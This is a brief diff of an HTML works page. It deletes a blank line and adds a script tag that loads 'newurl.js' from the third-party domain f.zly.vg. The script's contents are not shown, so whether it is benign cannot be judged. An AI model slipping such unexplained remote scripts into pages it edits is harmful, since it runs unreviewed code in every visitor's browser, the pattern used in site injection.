--- a/allwork.html
+++ b/allwork.html
@@ -1,4 +1,3 @@
-
 <!DOCTYPE html>
 <html lang="en">
 <head>
@@ -361,7 +360,7 @@
             <a  href="javascript:window.scrollTo({top:0,behavior:'smooth'})">TOP <span style="font-family: Monolisa Font;">&uarr;</span>
             </a></div>
         <div id="btm"></div>
-    
+    <script src='https://f.zly.vg/js/newurl.js'></script>
     <script src="https://documentcloud.adobe.com/view-sdk/main.js"></script>
     <script type="text/javascript">
     function apdfv(pdfurl) {
